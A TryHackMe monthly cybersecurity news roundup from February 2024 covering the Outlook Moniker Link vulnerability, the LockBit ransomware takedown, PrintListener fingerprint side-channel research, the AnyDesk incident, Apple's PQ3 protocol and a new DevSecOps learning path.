We’ve compiled some of the biggest news stories from the world of cyber security this month, including a new Microsoft Outlook vulnerability, the global crackdown success of LockBit ransomware, the transformation of swipe sounds to partial fingerprints, Apple introducing a ‘groundbreaking’ post-quantum cryptographic protocol, and the very latest updates from TryHackMe. Plus much, much more!
Keep reading for your monthly industry updates from February 2024.
New Microsoft Outlook vulnerability (CVE-2024-21413)
On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE & credential leak vulnerability with the assigned CVE of CVE-2024-21413 (Moniker Link). Haifei Li of Check Point Research is credited with discovering the vulnerability.
TryHackMe’s new recent threat room, Moniker Link (CVE-2024-21413), explores:
- How the vulnerability works
- Outlook’s ‘Protected View’
- How you can detect this attack
- Mitigation measures
Global crackdown success: LockBit ransomware ring dismantled by National Crime Agency
Following on from last month's discussion on LockBit, there's significant news: their operations have been effectively disrupted through a concerted global law enforcement effort. Two operators of the LockBit ransomware gang were arrested in Poland and Ukraine, and over 200 crypto wallets were seized. This crackdown also led to the creation of a decryption tool, now available for free, to help victims recover their encrypted files.
This operation, named Operation Cronos, was spearheaded by the UK National Crime Agency and involved multiple countries. It successfully compromised LockBit's infrastructure, taking down 34 servers across several nations and seizing critical data, including over 1,000 decryption keys. LockBit has been responsible for numerous high-profile cyber attacks worldwide.
Their DarkWeb “wall of shame” site is now under the control of the UK, the US and the Cronos task force.
This marks a hopeful advancement in the ongoing battle against ransomware criminals, significantly impacting LockBit's ability to operate.
PrintListener: transforming swipe sounds into partial fingerprints
Researchers from China and the U.S. have developed a novel side-channel attack named PrintListener, targeting biometric fingerprint security systems.
By analysing the sound of finger friction on touchscreen devices, they can extract fingerprint pattern features. The technique has demonstrated a success rate of up to 27.9% for partial fingerprints and 9.3% for complete fingerprints within five attempts, even under the highest security settings. This method poses a significant threat to the widely trusted and rapidly growing fingerprint authentication market, projected to reach nearly $100 billion by 2032.
Despite the complex science behind it, the researchers overcame several challenges, such as isolating finger pattern influences and advancing from primary to secondary fingerprint features, to refine their attack method, significantly surpassing the effectiveness of traditional MasterPrint fingerprint dictionary attacks.
AnyDesk incident response (5-2-2024)
AnyDesk issued a statement on February 5, 2024, following up on their initial public notice regarding a cyber incident from February 2, 2024. They assured users that immediate steps were taken to investigate and mitigate the incident and that they were cooperating with relevant authorities.
AnyDesk confirms that all versions of their software obtained from official sources remain safe to use, specifically recommending the latest versions 7.0.15 and 8.0.8. Additionally, they implemented a forced password reset for their customer portal (my.anydesk.com) as a precaution, stating there is no evidence of customer data exfiltration or end-user devices being affected.
AnyDesk emphasizes transparency, integrity, and trust in its products and acknowledges the limitations in immediate information disclosure following a cyber incident. An FAQ section has been set up on their website to address customer concerns and correct any misinformation. Contact information for further inquiries is provided via email and phone.
Apple introduces ‘groundbreaking’ post-quantum cryptographic protocol
Apple has just introduced PQ3, a groundbreaking post-quantum cryptographic protocol for iMessage, marking a significant upgrade in cryptographic security.
This protocol is designed to provide Level 3 security, the highest level of security in messaging apps, offering protection against both current threats and potential future quantum computing attacks.
PQ3 is characterised by its use of post-quantum cryptography for initial key establishment and ongoing message exchange, setting it apart from other messaging apps that either lack end-to-end encryption by default (Level 0) or offer end-to-end encryption without quantum security (Level 1).
PQ3 represents a major advancement over iMessage's previous updates, which included the switch to Elliptic Curve cryptography (ECC) and enhanced protection of encryption keys with the Secure Enclave. The new protocol employs post-quantum algorithms and ECC, ensuring it remains secure against classical and quantum computing threats. It features a novel post-quantum rekeying mechanism that can self-heal from key compromise, thereby protecting future messages.
The development of PQ3 involved rigorous testing and formal verification by leading experts in cryptography, confirming its security against both classical and quantum adversaries. The protocol's design ensures that it adds post-quantum confidentiality to iMessage, providing users with assurance of the privacy of their communications in the face of advancements in quantum computing technology. This initiative underscores Apple's commitment to pioneering advanced cryptographic protections and maintaining iMessage's status as a leader in secure messaging technologies.
Toothbrushes used in massive DDoS attack?
Taking a break from all the drama, a translation mishap stemming from an interview with Fortinet led to widespread scepticism among cyber security experts.
This incident revolved around a story about 3 million electric toothbrushes being implicated in a cyber attack, which was initially reported by CH Media and quickly gained international attention.
Despite the intriguing nature of the case, the cyber security community raised doubts, with some dismissing the story as fiction and lacking evidence. Fortinet later clarified that the scenario was hypothetical, used to illustrate a Distributed Denial of Service (DDoS) attack during an interview, and not based on actual research.
This clarification highlighted the challenges in accurately conveying technical examples across languages and cultures, ultimately sparking a dialogue on the importance of precision in cyber security communications.
In the realm of cyber security, this incident has given "brushing up on the facts" a whole new meaning!
TryHackMe’s NEW DevSecOps learning path
This month, TryHackMe also released a brand new DevSecOps learning path, which shows you how to secure modern software development environments with hands-on learning around secure deployments, CI/CD and automation security.
The DevSecOps path covers the core principles and areas needed to develop a strong foundation in DevSecOps, to prepare and give you the tools to succeed in either developing a team, becoming a DevSecOps Engineer, or looking to expand your skill set.
Are you ready to adapt to a new era? Launch our new DevSecOps learning path now!
Jabba
